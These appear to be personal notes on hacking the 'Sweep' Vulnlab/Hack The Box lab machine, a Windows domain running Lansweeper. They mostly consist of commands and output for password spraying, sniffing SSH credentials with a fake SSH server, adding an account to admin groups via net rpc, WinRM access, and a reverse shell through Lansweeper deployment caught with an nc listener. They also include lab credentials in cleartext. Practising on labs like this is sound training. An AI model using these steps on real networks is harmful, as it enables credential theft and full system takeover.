Here is my notes on SWEEP box from Vulnlab which deployed to Hackthebox.
SWEEP: 10.10.72.126
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
81/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-title: Lansweeper - Login
|_Requested resource was /login.aspx
#Requires Windows-AD Creds or Workstation local-creds.
intern:intern
#Scan to Kali.
#Scan credentials to Kali with Linux credentials (Inventory_Linux).
svc_inventory_lnx #For example.
SSH Credential Sniffing:
go install github.com/fffaraz/fakessh@latest
sudo setcap 'cap_net_bind_service=+ep' ~/go/bin/fakessh
./fakessh
Click Scanning Queue
┌──(root㉿kali)-[~/go/bin]
└─# ./fakessh
2024/03/06 15:05:49.881491 10.10.72.126:52694
2024/03/06 15:05:51.039436 10.10.72.126:52706
2024/03/06 15:05:51.540093 10.10.72.126:52708
2024/03/06 15:05:52.021397 10.10.72.126:52708 SSH-2.0-RebexSSH_5.0.8372.0 svc_inventory_lnx 0|5m-U6?/uAX
svc_inventory_lnx:0|5m-U6?/uAX
PRIV ESC:
#Lansweeper Admin privilege required.
net group "Domain Admins" svc_inventory_lnx /add /domain
Login back to Lansweeper with svc_inventory_lnx:0|5m-U6?/uAX
We created a new credential mapping and this time as Windows Computer for sweep\inventory on Inventory Windows.
Then go to deployment section and add the package name as test.
Then Enable RCE to rest and apply to INVENTORY asset with powershell payload.
#revshell.sh
Wait to gain a SYSTEM-SHELL
https://github.com/purplestormctf/Writeups/blob/main/vulnlab/machines/sweep/Sweep.md#privilege-escalation
sudo rlwrap nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.8.0.71] from (UNKNOWN) [10.10.127.24] 55760
PS C:\Windows\system32> whoami
nt authority\system
SYSTEM-SHELL !
PS C:\Users\Administrator\Desktop> whoami
nt authority\system
PS C:\Users\Administrator\Desktop> hostname
inventory
PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/8/2024 12:44 PM 36 root.txt
PS C:\Users\Administrator\Desktop> type root.txt
VL{REDIRECTED}
ROOT.TXT: VL{REDIRECTED}
82/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| ssl-cert: Subject: commonName=Lansweeper Secure Website
| Subject Alternative Name: DNS:localhost, DNS:localhost, DNS:localhost
| Not valid before: 2021-11-21T09:22:27
|_Not valid after: 2121-12-21T09:22:27
| tls-alpn:
|_ http/1.1
|_ssl-date: TLS randomness does not represent time
| http-title: Lansweeper - Login
|_Requested resource was /login.aspx
#Same as port 81.
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-03-06 18:12:43Z)
-NO ASREPROASTING.
bloodhound-python -c All -u intern -p intern -d sweep.vl --dns-tcp -ns 10.10.72.126
#NOPE for intern user.
svc_inventory_lnx member of Lansweeper Discovery -> Genericall -> Lansweeper Admin -> PSREMOTE -> Target.
net rpc group addmem "LANSWEEPER ADMINS" "svc_inventory_lnx" -U "SWEEP.LOCAL"/"svc_inventory_lnx"%"0|5m-U6?/uAX" -S "10.10.72.126"
net rpc group members "LANSWEEPER ADMINS" -U "SWEEP.LOCAL"/"svc_inventory_lnx"%"0|5m-U6?/uAX" -S "10.10.72.126"
┌──(root㉿kali)-[/home/…/BOXES/COMP/SWEEP/10.10.72.126]
└─# net rpc group addmem "LANSWEEPER ADMINS" "svc_inventory_lnx" -U "SWEEP.LOCAL"/"svc_inventory_lnx"%"0|5m-U6?/uAX" -S "10.10.72.126"
┌──(root㉿kali)-[/home/…/BOXES/COMP/SWEEP/10.10.72.126]
└─# net rpc group members "LANSWEEPER ADMINS" -U "SWEEP.LOCAL"/"svc_inventory_lnx"%"0|5m-U6?/uAX" -S "10.10.72.126"
SWEEP\jgre808
SWEEP\svc_inventory_lnx
net rpc group members "Domain Admins" -U "SWEEP.LOCAL"/"svc_inventory_lnx"%"0|5m-U6?/uAX" -S "10.10.72.126"
┌──(root㉿kali)-[/home/…/BOXES/COMP/SWEEP/10.10.72.126]
└─# crackmapexec winrm 10.10.72.126 -u svc_inventory_lnx -p '0|5m-U6?/uAX'
SMB 10.10.72.126 5985 INVENTORY [*] Windows 10.0 Build 20348 (name:INVENTORY) (domain:sweep.vl)
HTTP 10.10.72.126 5985 INVENTORY [*] http://10.10.72.126:5985/wsman
WINRM 10.10.72.126 5985 INVENTORY [+] sweep.vl\svc_inventory_lnx:0|5m-U6?/uAX (Pwn3d!)
*Evil-WinRM* PS C:\> dir
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/8/2024 11:50 AM inetpub
d----- 5/8/2021 1:20 AM PerfLogs
d-r--- 2/11/2024 1:30 AM Program Files
d----- 2/8/2024 12:17 PM Program Files (x86)
d-r--- 3/6/2024 12:28 PM Users
d----- 2/11/2024 1:43 AM Windows
-a---- 2/8/2024 12:43 PM 36 user.txt
*Evil-WinRM* PS C:\> type user.txt
VL{REDIRECTED}
USER.TXT: VL{REDIRECTED}
USER SHELL !
https://github.com/purplestormctf/Writeups/blob/main/vulnlab/machines/sweep/Sweep.md
135/tcp open msrpc Microsoft Windows RPC
┌──(root㉿kali)-[/home/…/BOXES/COMP/SWEEP/10.10.72.126]
└─# sudo impacket-rpcdump @10.10.72.126 | egrep 'MS-RPRN|MS-PAR'
Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol
Protocol: [MS-RPRN]: Print System Remote Protocol
┌──(root㉿kali)-[/home/…/BOXES/COMP/SWEEP/10.10.72.126]
└─# rpcclient --user="" --command=srvinfo -N 10.10.72.126
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
┌──(root㉿kali)-[/home/…/BOXES/COMP/SWEEP/10.10.72.126]
└─# rpcclient --user="" --command=getdompwinfo -N 10.10.72.126
result was NT_STATUS_ACCESS_DENIED
#NOPE.
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
┌──(root㉿kali)-[/home/…/BOXES/COMP/SWEEP/10.10.72.126]
└─# smbclient -N -L 10.10.72.126
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
DefaultPackageShare$ Disk Lansweeper PackageShare
IPC$ IPC Remote IPC
Lansweeper$ Disk Lansweeper Actions
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.72.126 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
┌──(root㉿kali)-[/home/…/BOXES/COMP/SWEEP/10.10.72.126]
└─# crackmapexec smb 10.10.72.126 -u guest -p '' --shares
SMB 10.10.72.126 445 INVENTORY [*] Windows 10.0 Build 20348 x64 (name:INVENTORY) (domain:sweep.vl) (signing:True) (SMBv1:False)
SMB 10.10.72.126 445 INVENTORY [+] sweep.vl\guest:
SMB 10.10.72.126 445 INVENTORY [+] Enumerated shares
SMB 10.10.72.126 445 INVENTORY Share Permissions Remark
SMB 10.10.72.126 445 INVENTORY ----- ----------- ------
SMB 10.10.72.126 445 INVENTORY ADMIN$ Remote Admin
SMB 10.10.72.126 445 INVENTORY C$ Default share
SMB 10.10.72.126 445 INVENTORY DefaultPackageShare$ READ Lansweeper PackageShare
SMB 10.10.72.126 445 INVENTORY IPC$ READ Remote IPC
SMB 10.10.72.126 445 INVENTORY Lansweeper$ Lansweeper Actions
SMB 10.10.72.126 445 INVENTORY NETLOGON Logon server share
SMB 10.10.72.126 445 INVENTORY SYSVOL Logon server share
┌──(root㉿kali)-[/home/…/COMP/SWEEP/10.10.72.126/JUNK]
└─# smbclient \\\\10.10.72.126\\DefaultPackageShare$ -U "Guest"
Password for [WORKGROUP\Guest]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Feb 8 14:46:04 2024
.. D 0 Thu Feb 8 14:47:44 2024
Images D 0 Thu Feb 8 14:46:08 2024
Installers D 0 Thu Feb 8 14:46:04 2024
Scripts D 0 Thu Feb 8 14:46:08 2024
5078271 blocks of size 4096. 599980 blocks available
smb: \> mask ""
smb: \> recurse
smb: \> prompt
smb: \> mget *
getting file \Images\WindowsLS.jpg of size 132382 as Images/WindowsLS.jpg (105.8 KiloBytes/sec) (average 105.8 KiloBytes/sec)
getting file \Scripts\CmpDesc.vbs of size 1119 as Scripts/CmpDesc.vbs (1.4 KiloBytes/sec) (average 64.3 KiloBytes/sec)
getting file \Scripts\CopyFile.vbs of size 728 as Scripts/CopyFile.vbs (1.0 KiloBytes/sec) (average 47.5 KiloBytes/sec)
getting file \Scripts\Wallpaper.vbs of size 1245 as Scripts/Wallpaper.vbs (2.1 KiloBytes/sec) (average 39.8 KiloBytes/sec)
smb: \>
#No common passwords.
#No LLMNR Poisoning.
crackmapexec smb 10.10.72.126 -u users.txt -p users.txt --continue-on-success
SMB 10.10.72.126 445 INVENTORY [+] sweep.vl\intern:intern
┌──(root㉿kali)-[/home/…/BOXES/COMP/SWEEP/10.10.72.126]
└─# crackmapexec smb 10.10.72.126 -u intern -p intern --shares
SMB 10.10.72.126 445 INVENTORY [*] Windows 10.0 Build 20348 x64 (name:INVENTORY) (domain:sweep.vl) (signing:True) (SMBv1:False)
SMB 10.10.72.126 445 INVENTORY [+] sweep.vl\intern:intern
SMB 10.10.72.126 445 INVENTORY [+] Enumerated shares
SMB 10.10.72.126 445 INVENTORY Share Permissions Remark
SMB 10.10.72.126 445 INVENTORY ----- ----------- ------
SMB 10.10.72.126 445 INVENTORY ADMIN$ Remote Admin
SMB 10.10.72.126 445 INVENTORY C$ Default share
SMB 10.10.72.126 445 INVENTORY DefaultPackageShare$ READ Lansweeper PackageShare
SMB 10.10.72.126 445 INVENTORY IPC$ READ Remote IPC
SMB 10.10.72.126 445 INVENTORY Lansweeper$ READ Lansweeper Actions
SMB 10.10.72.126 445 INVENTORY NETLOGON READ Logon server share
SMB 10.10.72.126 445 INVENTORY SYSVOL READ Logon server share
┌──(root㉿kali)-[/home/…/BOXES/COMP/SWEEP/10.10.72.126]
└─# crackmapexec smb 10.10.72.126 -u svc_inventory_lnx -p '0|5m-U6?/uAX' --shares
SMB 10.10.72.126 445 INVENTORY [*] Windows 10.0 Build 20348 x64 (name:INVENTORY) (domain:sweep.vl) (signing:True) (SMBv1:False)
SMB 10.10.72.126 445 INVENTORY [+] sweep.vl\svc_inventory_lnx:0|5m-U6?/uAX
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sweep.vl0., Site: Default-First-Site-Name)
LDAPv3 - NOPE, dead-end.
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ldapssl?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sweep.vl0., Site: Default-First-Site-Name)
3269/tcp open globalcatLDAPssl?
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-03-06T18:13:43+00:00; -2s from scanner time.
| rdp-ntlm-info:
| Target_Name: SWEEP
| NetBIOS_Domain_Name: SWEEP
| NetBIOS_Computer_Name: INVENTORY
| DNS_Domain_Name: sweep.vl
| DNS_Computer_Name: inventory.sweep.vl
| Product_Version: 10.0.20348
|_ System_Time: 2024-03-06T18:13:05+00:00
| ssl-cert: Subject: commonName=inventory.sweep.vl
5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Service Unavailable
|_http-server-header: Microsoft-HTTPAPI/2.0
PORT STATE SERVICE VERSION
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
9524/tcp open ssl/unknown
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200 OK
| Content-Length: 1
| Connection: close
| Content-Type: text/html
| Date: Wed, 06 Mar 2024 18:19:19 GMT
| Server: Kestrel
| api-supported-versions: 1.0
| TerminalServerCookie:
| HTTP/1.1 400 Bad Request
| Content-Length: 0
| Connection: close
| Date: Wed, 06 Mar 2024 18:19:39 GMT
|_ Server: Kestrel
| ssl-cert: Subject: commonName=lansweeper-server-communication
| Subject Alternative Name: DNS:localhost, DNS:INVENTORY, DNS:inventory.sweep.vl, IP Address:192.168.115.145
| Not valid before: 2024-02-08T19:51:08
|_Not valid after: 3024-02-08T19:51:08
|_ssl-date: 2024-03-06T18:21:01+00:00; -1s from scanner time.
| tls-alpn:
| h2
|_ http/1.1
49664/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49671/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49672/tcp open msrpc Microsoft Windows RPC
49679/tcp open msrpc Microsoft Windows RPC
49719/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
#No Lansweeper exploit.